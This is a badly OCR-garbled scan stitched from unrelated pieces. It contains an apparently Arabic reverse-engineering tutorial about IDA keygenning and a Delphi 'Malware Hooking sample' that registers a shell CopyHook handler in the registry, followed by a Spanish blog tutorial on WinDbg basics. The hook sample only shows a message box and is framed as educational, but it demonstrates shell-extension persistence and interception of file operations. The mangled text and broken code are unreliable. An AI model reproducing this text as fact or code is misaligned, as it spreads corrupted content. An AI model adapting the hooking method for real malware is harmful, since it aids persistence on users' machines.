134 OPTION PROLOGUE : PROLOGUEDEF 
135 (OPTION EPILOGUE:EPILOGUEDEF 


> 


7 Uva s0prologue sJepilogue 332 amaia dóA, 


Ce e ES 
3 Adal ? ad ia T 
Guo 31) Bayaproc Bi al! y2CAN ucalo qa A ZA JOA ua: 


16  GenerateProc proc: 
17 PUSH EBP 


aby 0 U calado ll pal 2009 (527 == 


lug le as ami ES UAgZ: ATARE gd md lvalasz 


AIDA pluginsz ¿so 52 AKeygenning IDA Plugin 3 ue 


94d gba casó 


; int _ stdcall sub _4013€9(int, int, : 


: ALT+F1OVÍ+ e 55 Edit >Code snipet creator 9 02 oz 3 


Y | Indude library functions 
Remap impaddrs to real func offsets 
Remap impaddrs to real var offsets 
Indude forwarder (thunk) functions 
Y | Indude hidden items 


Y | Sudden death on first fatal 


Code snippet creator (3) 
General settings | Runtime features 
Follow refs from code Type Data 8 formatting == 
y! To code Y]CRefs  Offsets alignment 4H 
To data Y] DRefs Y] Recognize offsets 
Follow refs from data Y Only to not tails 
Y] To code Y| Only to defined items (heads) 
Y] To data | Resolve local<->global names conflicts 
y | Try to detect align directives 
Follow from... and Types filters are in logical 
AND relation Compatibility 8: format 
Function filtering 


Kill enums (compat.) 
Y|Exdude externde 
Y|Execute basic code deanup 

Run external filter upon output 


<info: put external program or sc 


a ay ll ao lll 


cor) [conc] 


las leg as yz Ives oasz: ATARE o y ud WwelelVrs e 


SE Llao 93 344 pozos RE ye só 


AKeygenning IDA Keygen» ES 


o 
y 
y 


ee 
y ió E 
E Co) oso bis 4ue aba e ola: Jo Go) de Salgo 3 ER ¿ua y E XK de 39, 


all Bu A vd de Ado ¡pit 2009 


la) Jud... 


Malwares Hookins 


.Delphi7 O MES 
vajócica dy 2 80 VMWare O) 
Process-7 Op ATARE Faust Virus Remover (5) 


¿Cue? eÍd) ATARE Kernel Detective fo] 


alias ¿oa (d lr eEUá) 


all ly 00 Ja Iboga 2009 


ds 


las lug ag ama les uaga: ATARE grid las loe doc 
« s 4 A » 
Hook + Explorer.exe ¿as hmalz 9 bl y OJO yO 


gue DUE e ay Os 


¿po 1 
Winlogon.exeva* Ed 3bal or 


2 ua WinRar 


Elia y 


ZE 
a jr dea!" jala 


Windows Explorer .2 
Serós ¿ A AA E E 
dare jedi O ig Ma A ja 


Mr 4 
Windows explorer 0 dy 
Ouvrir 


y 
CUAL es A an! 00 Alca ¿dnd e 
¿2 Hooking +£,,9 ¿9439 ¿qué e go palo a: 
Activer/Désactiver les icónes de signature numérique 
Compress With Nspack 
Decompile with QuickBFC 
Load into PE editor (LordPE) 
Open writh CFF Explorer 
Open with DeDe 
Open weith OllyDbg 
Open writh PE Explorer 
RDG Packer Detector 


Exécuter en tant que... 


Scan With 4T4RE FastScanner 
Scan with PEID 

--> ExE Info PE scan <-- 
Hex Edit with Hex Workshop v5 


Ki Scan for viruses 


[-FEdit with Notepad++ 
Y Ajouter á l'archive... 


MD ninitar d "Fariot rar" 


O IO 


d a ¿ya ¿-Hooking 40 Us COS rá, de tz ve ¿ol 
úl 


ZE 


sta rai 
da oa bic al dj, 
A INS 


sa — 


loba leg or VES AGE: ATARE grill li IuE dot 


ñ ss LS EN aLo Y d 


Ade o y 
a Joa Aya CUA 


unit MalwareHooxk; 


interface 


Unitl 


Y) dd: 


CU tots 


5 


0 galo aso uz ZORO ¿eur aula 


Unit pas 


($R *.dfm) 


elo lr lo 


s 


$08 
ya 


¿G+Shift + Ctrl 


procedure TForml.FormCreate (Sender: TObject):; 


begin 
['(0494E124-B95B-4144-BD50-6B24CE4FE53D;'] 
['(8814772BB-2960-423C-9196-E79058177?40743'] 
['(FA5581475858-07587-4D75-BBDEB-3EO03ACDCCSEO;'] 
['(9FA1S5FE1-9C03-49B6-14337-ABCOSACTA46593'] 
['(A4637E565-EB3D-4606-581B2-AB1FB514374023'] 
['(02302569-4CE0O-4BA49-588CD-DDCES7D62EE2;'] 
['(925558E54-144B6-4E56-AD17?-54D2B1508DD3)'] 
['(1644952C-4B95-4082-B5B3-D3F9C85E4035)'] 
['¿D20209ED-41417-4970-S90BA-DE3SFO?BCCFFA;'] 
['(9148176FB-43E0-43C9-9CC3-97F9CEB4E825)'] 
['(76BECOS5F-CO8D-463B-A6E7?-4D5DF4078EC4)'] 
['(EADC3A03-7FAB-4116-BBD3-3AFC73IB8DEO3A;'] 
end: 


Geshift+ Ctrl ió de sd laa 


1E124-B95B-4A44-BD50-6B24CE4FE53DO494( : Mañniyy co de 


. Demos ¿6 ch 7 olas ya 


XProgram FilesiBorlandWDelphiZYDemoslActiveXIShellExt : 322 


1 


ya Ruca qe jo 


4 


all Bu ls ud de Ado Ibpit 2009 


23 1 ¿053200 Rename-Delete-Move=Copy 


loba leg ori VES UAG: ATARE id oie e 


uses 
Windows, ActiveX, Com0bj, Shl10b3; 


type 
TCopyHook = class (TCom0bject, ICopyHook) 
public 
function CopyCallback(Wnd: HWND; wFunc, wFlags: UINT; pszSrcFile: PAnsiChar; 
dwSrcAttribs: DWORD; pszDestFile: PAnsiChar; dwDestAttribs: DWORD): UINT; 
stdcall; 
end; 


const 
Class CopyHook: TGUID = '(0494E124-B95B-4A44-BD50-6B24CE4FE53D)'; 
implementation 


uses ComServ, ShellAPI, SysUtils, Registry; 


al a Y gro 990 Des pulga: 


function TCopyHook.CopyCallBack (Wnd: HWND; wFunc, wFlags: UINT; pszSrcFile: 
PAnsiChar; 

dwSrcAttribs: DWORD; pszDestFile: PAnsiChar; dwDestAttribs: DWORD): UINT; 
// This is the method which is called by the shell for folder operations 
const 


ConfirmMessage = 'Sorry :) | This function is disabled'+13 
+ 'System Hooking | Only for Educational use '*13 
+ ""4$13 


+ 'Arab Team 4 Reverse Engineering'+13 
+ 'STRELiTZIA | AT4RE'$13 
+ 'ww.at4re.com'; 


var 
Operation: string; 
begin 
case wFunc of 
FO COPY: 
Operation := 'copy'; 
FO_ DELETE: 
Operation 
FO MOVE: 
Operation 
FO_RENAME: 
Operation := 'rename'; 
else 
Operation := '0'; 
end; 


'delete'; 


'"move'; 


Result := MessageBox (Wnd, PChar (Format (ConfirmMessage, [Operation, 
pszSrcFile])), 
'Malware Hooking sample' MB 0K); 
end; 


all Bu ls ud caJado Ibpit 2009 (533 ) 


loba log or VES UAG: ATARE grille oleo e 


desd 


al ES dl Ll Zo ¿ $ do regsvr32 godó » aula buú al ad: 


type 
TCopyHookFactory = class (TComO0bjectFactory) 
public 
procedure UpdateRegistry (Register: Boolean); override; 
end; 


procedure TCopyHookFactory.UpdateRegistry (Register: Boolean); 
var 
ClassID: string; 
begin 
if Register then begin 
inherited UpdateRegistry (Register); 


ClassID := GUIDToString (Class CopyHook); 
CreateRegKey ('Directory1shellexlCopyHookHandlersiMalwareHookSample', '', 
ClassID); 


if (Win32Platform = VER PLATFORM WIN32 NT) then 
with TRegistry.Create do 
try 
RootKey := HKEY LOCAL MACHINE; 
OpenKey ( ' SOFTWAREAMicrosoftYWindows1CurrentVersion1Shell Extensions', 


True); 
OpenKey ('Approved', True); 
WriteString(ClassID, 'Malware Hooking Example'); 
finally 
Free; 
end; 
end 


else begin 
DeleteRegKey ('Directory1shellexlCopyHookHandlersiMalwareHookSample'); 


inherited UpdateRegistry (Register); 
end; 
end; 


initialization 
TCopyHookFactory.Create (ComsServer, TCopyHook, Class CopyHook, '', 
'Malware Hook Example', ciMultilnstance, tmApartment); 


end. 


A INS 
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program Setup; 


uses SysUtils, Windows; 


function RegisterServer (const aDllFileName: string; aRegister: Boolean): Boolean; 
type 
TRegProc = function: HResult; 
stdcall; 
const 
cRegFuncNameArr: array[Boolean] of PChar = 
('D1ilUnregisterServer', 'DllRegisterServer'); 
var 
vLibHandle: THandle; 
vRegProc: TRegProc; 
begin 
Result := False; 
vLibHandle := LoadLibrary(PChar (aD11FileName)); 
if vLibHandle = 0 then Exit; 
fQvRegProc := GetProcAddress (vLibHandle, cRegFuncNameArr [aRegister]); 
if (vRegProc <> nil then 
Result := vRegProc = S OK; 
FreeLibrary (vLibHandle); 
end; 


begin 

case MessageBox(0, 'Click YES -— To Install HOOK - Restart your system'++13'Click 
NO - To Uninstall HOOK - Restart your system', ' Malware System hooking sample', 
MB _YESNOCANCEL + MB_ICONQUESTION) of 
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ID YES: if RegisterServer ('MalwareHookTest.dl1', True) then MessageBox(0, 
"HOOK Installed', 'Sucess', MB_OK + MB_ICONINFORMATION); 
ID NO: if RegisterServer ('MalwareHookTest.dl1', False) then MessageBox(0, 
"HOOK Unistalled', 'Sucess', MB_OK + MB_ICONINFORMATION) ; 
end; 


end. 
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MalwareHook... 
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Malware System hooking sample 
2 Click YES - To Install HOOK - Restart your system 
sy) Click MO - To Uninstall HOOK - Restart your system 
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[HKEY CLASSES ROOTACLSIDA(0494E124-B95B-4A44-BD50-6B24CE4FE53D)] 
(="Malware Hook Example" 
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Q="C:AXNDOCUME=1XXUTILIS-1MMBureauxAMALWAR-1.DLL" 
"ThreadingModel"="Apartment" 
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[HKEY CLASSES _ROOTADirectorylshellexlCopyHookHandlerslMalwareHookSample] 
(="(0494E124-B95B-4A44-BD50-6B24CE4FE53D)]" 
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[HKEY LOCAL MACHINEASOFTWAREAMicrosoftWindowslCurrentVersionlShell 
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"(8DD448E6-C188-4aed-AF92-44956194EB1F)"="Windows Media Player Play as Playlist 
Context Menu Handler" 

"(CE3FB1D1-02AE-4a5f-A6E9-D9F1B4073E6C)"="Windows Media Player Burn Audio CD 
Context Menu Handler" 

"(F1B9284F-E9DC-4e68-9D7E-42362A59F0FD)"="Windows Media Player Add to Playlist 
Context Menu Handler" 
"(BDEADFO0O0-C265-11D0-BCED-00A0C9O0ABS50OF)"="Dossiers Web" 
"(00020D75-0000-0000-C000-000000000046])"="Microsoft Office Outlook Desktop Icon 
Handler" 

"(0006F045-0000-0000-C000-000000000046)"="Microsoft Office Outlook Custom Icon 
Handler" 
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PUSH EDI 
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Surviving the Night 


Descubriendo WinDbg 


Que triste será el día en que yo sea abuelo, y cuando mis nietos me pidan que les cuente mis 
locuras de juventud solo se me ocurran cosas como la noche en que algunos compañeros de 
Plain Concepts nos pusimos a crackear el buscaminas con el WinDdg a eso de las 2:00 am. 


La verdad es que siempre he sido un poco raro para estas cosas: de pequeño no se me daba 
nada bien jugar a los juegos de plataformas, así que tiraba de Softlce (el viejo, para DOS, 
de NuMega :) ) y me dejaba matar algunas vidas, miraba a ver que direcciones de memoria 
seguían un patrón de decrecimiento, y cuando localizaba la dirección de memoria que 
almacenaba el número de vidas, lo ponía a FF, y voilá, 256 vidas ;) ¡El proceso era más 
divertido muchas veces que el propio juego! 


Supongo que debido a este oscuro pasado mío, mis ojos se abrieron como platos cuando 
descubrí la depuración postmortem de la mano,principalmente, de Nacho Alonso y David 
Salgado, y del resto de mis compañeros de Soporte en Microsoft, a los que les debo un 
buen cacho de lo que soy (¡¡un abrazote a todos!!). Desde ese momento me enganche al 
WinDbg, y hasta hoy me dura la tontería ;) 


Espero poder dedicar algunas entradas de este blog a introducir el WinDbg, así como 
escenarios útiles (y no tan útiles! XD) de uso. 


Que es el WinDbg 


Microsoft pone a nuestra disposición (bajo licencia BTF, esto es, By The Face XD) las 
Debugging Tools for Windows, una suite de aplicaciones y documentación destinadas a la 
depuración en sistemas Windows. WinDbg es una de éstas herramientas: concretamente es 
un depurador que nos permite adjuntarnos a procesos de usuario y al kernel del sistema 
operativo (por tanto, soporta tanto user mode debugging como kernel mode debugging), 
que permite tanto la depuración en vivo (live debugging), que consiste en adjuntarse a un 
proceso que está en ejecución, como la depuración postmortem, mediante el análisis de 
volcados de memoria generados por la aplicación o el sistema operativo en momentos 
determinados. Y además de todo esto, ¡dispone de una interfaz gráfica! Bueno, o eso al 
menos dicen los de Redmond, porque muy gráfica la verdad es que no lo es :) Os adjunto 
un pantallazo de una sesión de depuración: 


File Ede View Debug Window Help 


S$| cue Aa APP AOAPARUDORCOOO EAS 


00000000 ££d479950 calcle_to_one_half -» «no type information> 
£1£d69b74 calcimulrat -» <no type infornstion> 
f1íd74ba8 calcinuapovlongx -» «no type infornation> 
fídó69d0c calolsubrat » «no type inforaation> 
£1d78710 calclinit_q_rat_dvword » «no type information> 
£1d78210 calclinit_p_rat_two * «no type information> 
11475140 calc!lsNonvritablelnCurrentinage » «no type infornation> 
f1d78608 calclinit_q_rat_qvword » «no type information> 
fídédtde calcinuatonkadixx =*. «no type infornmation> 
11475540 calc!_divnun * <ro type infornation> 
t1d612c0 calc!_imp_CheckRadioButton + «no type informati0n> 
ttd?70a4dc calc!itanhrat = «no type infornmation> 
11479880 calc!ln_ten + «no types informati0on> 
11478440 calcigldPrevious + <no type information> 
t1d6e794 calcinuanpoviong + <no type infornation> 
11476334 calcinenset += <no types inlormation> 
t1d76080 calce! _NULL_ IMPORT_DESCRIPTOR + <mo typs information> 
11479688 calc!lphnoStatNun + <no type information> 


l60c 1554 Suspend. 1 Teb: 000007£f” t££de000 Untrozen 
Retáddr Call Site 

00231718 00000000'779le68s USERI2!ZwUzserGetMeszage+0xa 

00231800 00000000" £td6119%a USERI2 !GetMeszageV+0x34 

002316830 00000000" t£td75c03 calc!VinMoin+0x512 

0023£960 00000000 7780cdod calce /VinSgaiddToStrean+0xled 

0023fa20 00000000'77a2c6e1 kernel32/BoseThresdInitThunk+0xd 

0023fa50 00000000 00000000 ntd11/Rt lUserThresdStart+0x1d 


16c0c. 1028 Suspend: 1 Teb: 000007€f  £££dc000 Untrozen 
RetAddr Call Site 
02dafd48 00000000 770c3%e8 ntdl1 /DegBreskPosrnt 
02dafd50 00000000 7780cdod ntdll DigUiRenoteBreskin+0x30 
02dafd80 00000000 77a2c6e1 kernel122/BaseThresdInitThunk+0xd 
00000000'02dafdb0 00000000 00000000 ntd11/Rt lUserThreadStart+0x1d 


« " 


0 - --- 


1n0,Col0 SysO:<Local» Proc 000:16cc  Thwd001:1028 YA PS NUM 


Como podéis ver, la ventana de comandos parece cualquier cosa menos gráfica :) Esto tiene 
una explicación: todos los depuradores de Microsoft tratan de mantener la compatibilidad a 
nivel de comandos. Si sabemos utilizar WinDbg, podremos saltar fácilmente a KD, CDB o 
NTSD, que son los depuradores de consola de Windows. 


La diferencia mas notable entre el WinDbg y los otros tres depuradores comentados es la 
extensibilidad mediante módulos; algunos de las extensiones más conocidas son la Son of 
Strike (sos.dll), que nos permite depurar código administrado, y la SIEExtPub.dll, que entre 
otras cosas permite listar regiones criticas. 


Un ejemplo: depurando el notepad.exe 


Ok, ya sabemos lo que es el WinDbg, y sabemos donde encontrarlo, así que si os animáis, 
acompañadme en una demo muy corta para familiarizarnos con él. Simplemente vamos a 
adjuntar el depurador a un proceso existente, en este caso el notepad.exe. 


Para empezar, nos descargamos las Debugging Tools for Windows y las instalamos en 
nuestra máquina. A continuación, arrancamos WinDbg.exe y, ta-dah!, ahí tenemos nuestro 
depurador gráfico :) 


Ahora necesitaremos el proceso al que nos vamos a adjuntar (en inglés debugee), que será 
en este caso el notepad.exe. Vamos a abrir el notepad y simulamos que vamos a abrir un 
fichero; pulsamos Ctrl+O y nos aparecerá la ventana donde podemos seleccionar el archivo 


a abrir. Ok, con esto, sin cerrar esa ventana ni abrir ningún fichero, hemos terminado de 
preparar nuestro debuggee. Debería aparecer como la imagen siguiente: 


'<IOUE Dia 4 - 071122 » Demos » XSD 


Documents 
Desktop 

Recent Places 
Computer 
Pictures 

Muse 

Recenthy Changed 
Searches 

Publie 


Folders 


Volvemos ahora al WinDbg, pulsamos F6 (que es el acceso rápido para adjuntarse a un 
proceso de la máquina) y nos aparecerá una ventana como la siguiente, donde podemos 
seleccionar el proceso al cual nos queremos adjuntar. 


Armach to Process 


El checkbox que aparece en la parte inferior de la ventana 
con el nombre de Noninvasive es muy importante. No 

amos a entrar en mucho detalle ya que es el primer artículo 
de la serie, pero os adelantaré que si ese checkbox no esta 
marcado, cuando cerremos la sesión de depuración el 
proceso depurado se cerrará también. Como veis, es un 
detalle muy importante, sobre todo si estamos trabajando en 

n servidor de producción: yo me se de alguno que se olvido 
de poner el modo no invasivo mientras depuraba un SQL 
Server en producción... titiriti, titiriti.... :D 


El otro detalle a destacar es que si bien los nombres del 
proceso ayudan, en muchas ocasiones no es suficiente para 
identificar el proceso exacto al que queremos adjuntarnos. 
Por ejemplo, si quisiéremos depurar una instancia concreta en un servidor con múltiples 
instancias, necesitaríamos recurrir al identificador del proceso (PID), ya que el nombre 
sería el mismo para todas las instancias (sqlservr.exe). 


De todos modos, nosotros lo tenemos bien fácil en este caso: seleccionamos el notepad.exe 
y le damos al Ok. A continuación os aparecerá una ventana en la que se muestra un 
chorrazo de texto, que aunque no vamos a describir en detalle, os adelanto que es la lista de 
todos los módulos (ejecutable, dlls, etc) que conforman el proceso notepad.exe. 


A partir de aquí el proceso a depurar esta detenido, y nosotros podemos empezar a lanzar 
comandos al WinDbg para analizar o modificar el proceso. Por ejemplo, si lanzamos el 
comando lm (acnonimo de List Modules) nos listará todos los módulos en memoria de ese 
proceso. A continuación os pongo un extracto de ésta salida en mi máquina: 


0:011> lm 

start end module name 

00000000 777d0000 00000000 77901000 kernel32 (deferred) 
00000000 * 77910000 00000000 779da000 USER32 (deferred) 
00000000 7790000 00000000' 77b5a000 ntd11 (export symbols) 


C:WwWwindowsXsystem32Antd11.d11 

00000000" fFfa0000 00000000" FFFcfo0o  notepad (deferred) 
00000001* 80000000 00000001'80083000  sfShellToo1s64 (deferred) 
000007fe'f47d0000 000007fe'f4858000  tiptsf (deferred) 
000007fe"f5c10000 000007fe'f62d2000 leframe (deferred) 
000007fe"f7080000 000007fe'*f7178000 actxprxy (deferred) 
000007fe"f7390000 000007fe'f73eb000 ntshrui (deferred) 
000007fe"f73f0000 000007fe'f7442000 msshsq (deferred) 
000007fe"f7530000 000007fe'*f75d7000 cscui (deferred) 


Como se puede ver, tenemos un modulo que se llama notepad. Podemos tratar de visualizar 
todas las funciones que expone mediante el comando x. Este nos muestra una lista de todos 
los indentificadores (nombres de funciones, de variables...) de un modulo, o los que 


cumplan cierto criterio mediante una expresión regular. En el siguiente ejemplo vamos a 
pedir que nos muestre todos los identificadores del modulo notepad: 


0:011> x notepad!* 
*** ERROR: Module load completed but symbols could not be loaded for 
CAWindowsSystem32Wmnotepad.exe 


Uuups, algo no está bien. Dice que faltan unos símbolos, y no nos muestra nada... bueno, 
vamos a ignorar de momento este mensaje. Fijaros simplemente en que la expresion que le 
pasamos fue <NombreModulo>!<expresionDeBusqueda>. 


Vamos a intentar mostrar otra cosa interesante: los volcados de pila de todos los hilos del 
proceso. Para ello, nada mas simple que el terriblemente intuitivo comando —*k. En mi 
máquina me ha devuelto 12 hilos, pero aquí voy a limitar la salida a un solo hilo: 


0:011> -*k 


O Id: 1798.1548 Suspend: 1 Teb: 000007ff "fffdcooo Unfrozen 
child -SP RetAddr Call Site 
00000000" 000df348 00000000*7780ed73 ntd11!NtwaitForMultiple0bjects+0xa 
00000000" 000df350 00000000*7792e96d 
kernel32!WaitForMultiple0bjectsEx+0x113 
00000000" 000df460 000007fe*fccblab6 
USER32 !MsgWaitForMultiple0bjectsEx+0x13d 
00000000" 000df500 000007fe*fcch371f DUser+0x1ab6 
00000000" 000df550 000007fe"fcchb3696 DUser !DeleteHandle+0x7df 
00000000" 000df590 00000000 7791bdl1a DUser !DeleteHandle+0x756 
00000000" 000df5c0 00000000*77a32016 USER32!CopyIcon+0x8a 
00000000" 000df610 00000000*7792df2a ntd11!kKiUserCallbackDispatcher+0x1f 
00000000" 000df678 00000000*779173e9 USER32!WaitMessage+0xa 
00000000" 000df680 00000000*7791760a USER32!LockWwindowUpdate+0x249 
00000000" 000df700 00000000*779174C6 
USER32!DialogBoxIndirectParamAorwW+0x19a 
00000000" 000df760 00000000' 77917918 
USER32!DialogBoxIndirectParamAorW+0x56 
00000000" 000df7a0 000007fe*fe473d2e USER32!DialogBoxIndirectParamwW+0x18 
00000000" 000df7e0 00000000 Fffa5146 COMDLG32!GetFileTitlew+0x121e 
00000000 "000df850 00000000 FFfa547e notepad+0x5146 
00000000 000df8c0 00000000 FFFa5b98 notepad+0x547e 
00000000 "000df920 00000000 FFFa6d33 notepad+0x5b98 
00000000 "000dfa50 00000000 *7792e25a notepad+0x6d33 
00000000" 000dfaad 00000000 7792cbaf USER32!GetwWindowLongPtrwW+0x13a 
00000000" 000dfb60 00000000*7792cdcd USER32!ReleaseDC+0x9f 


1 Id: 1798.310 Suspend: 1 Teb: 000007ff 'fffda000 Unfrozen 
child -SP RetAddr Call Site 
00000000" 0304f528 00000000*7780ed73 ntd11!NtwaitForMultiple0bjects+0xa 
00000000" 0304f530 00000000*7792e96d 
kernel32!WaitForMultiple0bjectsEx+0x113 
00000000 0304f640 000007fe' fccbiab6 
USER32 !MsgWaitForMultiple0bjectsEx+0x13d 
00000000 0304f6e0 000007fe'fccblaef DUser+0x1ab6 
00000000" 0304f730 000007fe*fcche4ad DUser+0xlaef 
00000000" 0304f7a0 000007fe'fcchbe3cc DUser !GetMessageExA+0x6d 


00000000" 0304f7f0 000007fe'fea994e7 DUser!RemoveGadgetProperty+0x59c 
00000000" 0304f880 000007fe'fea9967d msvcrt!_crtCompareStringW+0xf7 
00000000" 0304f8b0 00000000*7780cdcd msvcrt!beginthreadex+0x13d 
00000000" 0304f8e0 00000000 77a2c6el1 kernel32!BaseThreadInitThunk+0xd 
00000000" 0304f910 00000000 00000000 ntd11!RtlUserThreadStart+0x21 


Si nos fijamos, podemos ver que algunos módulos, como kernel32, muestran los nombres 
de los métodos en cada frame de la pila, mientras que otros, como los de notepad, 
solamente nos muestran el nombre del módulo y un número hexadecimal al lado. 
Nuevamente, esto se debe a que no tenemos disponibles símbolos para el modulo 
notepad.exe (y muchos otros).... 


Símbolos: Qué son, para qué nos sirven y dónde los conseguimos 


¿Alguna vez os fijasteis en los ficheros de extensión .pdb que acompañan a vuestros 
binarios en la caperta Ibinidebug? Pues si no los conocíais de antes, os los presento: son los 
símbolos de vuestro código. Su extensión es un acrónimo de Program Data Base, y su 
objetivo es servir de traducción entre direcciones de memoria u offsets dentro de un módulo 
y el nombre que se le ha dado a ese elemento durante el desarrollo, es decir, su 
identificador. 


¿Y para que nos sirven? Precisamente para evitar lo que nos sucede en el ejemplo del 
notepad de arriba, en el cual no podemos ver casi ninguna información del módulo. A 
modo de ejemplo, imaginemos que tenemos libreria llamada matematicas.dll y un método 
dentro de ella llamado Sumar. Si tuviera los símbolos de ésta librería, desde WinDbg podria 
ver algo como matematicas!Sumar como nombre del método, pero si no tuvieramos los 
símbolos seguramente veríamos algo parecido a matematicas+0x1ab6, lo cual no nos da 
ninguna pista de lo que realiza ese método. 


Para obtener los símbolos evidentemente hay que recurrir al desarrollador del producto. Si 
es un producto nuestro, tenemos que asegurarnos de tener los .pdb tanto para las versiones 
de debug como release (por defecto en Visual Studio, al compilar en modo release, no se 
generan los símbolos). Si se trata de un producto de terceros dependemos de que la empresa 
desarrolladora los distribuya. En el caso de Microsoft estamos parcialmente de 
enhorabuena, ya que gran cantidad de sus productos distribuyen los símbolos; eso si, una 
versión limitada de ellos, los llamados símbolos públicos. 


WinDbg incorpora una gestión de símbolos muy avanzada, de modo que podemos 
montarnos nuestro propio servidor de símbolos en nuestro disco duro o en un directorio 
compartido de la red, lo cual es buena idea a medida que la colección va creciendo. Ya 
veréis como al final acabáis coleccionando símbolos como si fueran cromos :D 


En mi caso, tengo una carpeta local con los símbolos (C:ASymbols), y en ella se descargan 
todos los símbolos que voy obteniendo. El propio WinDbg se encarga de ordenarla en 

directorios para que no haya problemas de versiones. Sin embargo, con la carpeta local no 
es suficiente, hay que especificar también servidores desde donde nos podamos descargar 
los símbolos que no tenemos. En este caso, solo os puedo dar uno, el servidor de símbolos 


públicos de Microsoft, que se encuentra en http://msdl.microsoft.com/download/symbols. 
Para especificar la ruta de símbolos podemos establecer la variable de entorno 
NT_SYMBOL_PATH o modificarla desde la interfaz de usuario del WinDbg (Ctrl+S o 
menú File -> File Symbol Path...). Para que no digáis que os hago pensar ni un poquitín, os 
dejo la cadena de símbolos que estoy utilizando para esta demo: 


SRV*cAsymbols*http://msdl.microsoft.com/download/symbols 
Una vez establecido nuestro servidor de símbolos, volvamos a la demo... 
... y de vuelta a WinDbg 


Con nuestros símbolos en orden, vamos a forzar a WinDbg a que nos vuelva a cargar los 
módulos y busque por los símbolos apropiados. Para ello emplearemos el comando .reload, 
que carga los símbolos de nuevo, y le pasamos los parámetros /v (verbose, es decir, nos 
imprime información detallada de los símbolos durante el proceso de carga) y /f (fuerza la 
carga de los símbolos. Si no se especifica este parámetro, los símbolos se cargan de modo 
perezoso, solo cuando son necesitados). A continuación pongo un fragmento de la salida en 
mi máquina: 


0:011> .reload /v /f 
Reloading current modules 
AddImage: C:WWindowsXsystem32XUSER32.d11 


D1llBase = 00000000 77950000 
Size = 000ca000 
Checksum = 000ce438 


TimeDateStamp = 45d3ee19 
AddImage: C:WWwindowsXsystem32Xkernel32.d11 


D1llBase = 00000000 77a20000 
Size = 00131000 
Checksum = 0013758a 


TimeDateStamp = 4549d328 
AddImage: C:WWindowsXsystem32Antd11.d11 


D1llBase = 00000000 77b60000 
Size = 0017a000 
Checksum = 0017b5ee 


TimeDateStamp = 4549d372 
AddImage: C:WWindowsXsystem32Anotepad.exe 


D1llBase = 00000000 fffe0000 
Size = 0002f000 
Checksum = 0003024b 


TimeDateStamp = 4549bb19 


Podemos ver como se están cargando los módulos, sus direcciones base, tamaño de los 
módulos, etc. Si queremos obtener un listado de todos los módulos y su estado, podemos 
repetir el comando Im que ya lanzamos antes. Esta vez la salida será similar a esta: 


0:011> 1m 
start end module name 
00000000 * 77950000 00000000 77a1a000 USER32 (pdb symbols) (...) 


00000000” 77220000 00000000 *77b51000 kernel32 (pdb symbols) (...) 
00000000” 77b60000 00000000 77cdad00  ntdll (pdb symbols) (...) 
00000000" Fffe0000 00000001 0000000 notepad (pdb symbols) (...) 


Podemos ver que los módulos ya están cargados (en lugar de deferred, nos aparece la 
etiqueta pdb symbols, o export symbols, etc.). Vamos a tratar de realizar las dos pruebas de 
antes, esto es, consultar todos los identificadores expuestos por el modulo notepad, y listar 
los call stack de algunos hilos para hacernos a la idea de lo que hacen. 


En el primer caso, volvemos a lanzar el comando x para consultar información expuesta por 
el modulo (podemos pensar que x viene de eXplore... estaremos equivocados, pero 
funciona como regla mnemotécnica :P). En mi máquina tengo la siguiente salida: 


0:011> x notepad!* 


ins”) 

00000000" ffff1600 notepad!PrintTime = <no type information> 

Luz) 

00000000" fffe7564 notepad!AlertBox = <no type information> 

00000000" ffff0630 notepad!szLoadDrvFail = <no type information> 
00000000" fffe25f0 notepad!IID_IQuickFilterPriv = <no type information> 
00000000"fffe10b8 notepad!_imp_GetTextExtentPoint32W = <no type 
information> 


luso) 
00000000 "ffff0578 notepad!szUntitled = <no type information> 
Co) 


Si recordáis, antes de tener los símbolos cargados no obteníamos ninguna salida al ejecutar 
este comando, mientras que ahora tenemos una lista enorme con todos los identificadores 
del módulo. Imaginaros que nos interesa buscar todos los métodos relacionados con la 
acción de guardar el fichero; podemos intentar lanzar una consulta como la siguiente: 


0:011> x notepad!*Save* 

00000000" fffe635c notepad!CheckSaveTaskD1gBox = <no type information> 
00000000"fffe5068 notepad!Show0penSaveDialog = <no type information> 
00000000"fffe8268 notepad!SaveGlobals = <no type information> 

00000000" fffe54c4 notepad!InvokeLegacySaveDialog = <no type information> 
00000000" ffff1384 notepad!fInSaveAsDlg = <no type information> 
00000000" fffe32f0 notepad!IID_IViewSaveRestriction = <no type 
information> 

00000000" fffe24d0 notepad!IID_IFileSaveDialog0ld = <no type information> 
00000000" ffff20c0 notepad!szSaveFilterSpec = <no type information> 
00000000" fffe4548 notepad!s_SaveAsHelpIDs = <no type information> 
00000000 "fffe17a0 notepad!IID_IFileSaveDialog = <no type information> 
00000000" fffe55f4 notepad!InvokeSaveDialog = <no type information> 
00000000" fffe24a0 notepad!IID_IFileSaveDialogPrivate = <no type 
information> 

00000000" ffff20b0 notepad!g_ftSaveAs = <no type information> 

00000000" fffe64c0 notepad!CheckSave = <no type information> 

00000000" ffff0620 notepad!szSaveCaption = <no type information> 
00000000" fffe7a90 notepad!NpSaveDialogHookProc = <no type information> 
00000000 "fffe17e0 notepad!CLSID_FileSaveDialog = <no type information> 
00000000" fffe33c0 notepad!CLSID_ScreenSaverPage = <no type information> 


00000000" fffe9e00 notepad!SaveFile = <no type information> 
00000000" fffe1050 notepad!_imp_GetSaveFileNamewW = <no type information> 


Ahora vamos a comprobar como se ven la pila de llamadas de un hilo del proceso: 
0:011> -*k 


O Id: ff4.6cc Suspend: 1 Teb: 000007ff "fffdco00 Unfrozen 
child -SP RetAddr Call Site 
00000000 0010f288 00000000' 77a5ed73 ntd11!'NtwaitForMultiple0bjects+0xa 
00000000'0010f290 00000000” 7796e96d 
kernel32!WaitForMultiple0bjectsEx+0x10b 
00000000 0010f3a0 000007fe' fcf31ab6 
USER32!Real1MsgWaitForMultiple0bjectsEx+0x129 
00000000 0010f440 000007fe'fcf3371f DUser!Coresc: :Wait+0x62 
00000000 0010f490 000007fe'fcf33696 DUser!CoresC: :WaitMessage+0x6f 
00000000 0010f4d0 00000000 7795bdla DUser !MphWaitMessageEx+0x36 
00000000 0010f500 00000000” 77bb2016 USER32!_ClientWaitMessageExMPH+0x1a 
00000000 0010f550 00000000” 7796df2a 
ntd11!'KiUsercallbackDispatcherContinue 
00000000'0010f5b8 00000000” 779573e9 USER32!ZwUserWaitMessage+0xa 
00000000 0010f5c0 00000000” 7795760a USER32!DialogBox2+0x261 
00000000 0010f640 00000000” 779574C6 USER32!InternalDialogBox+0x134 
00000000 0010f6a0 00000000” 77957918 
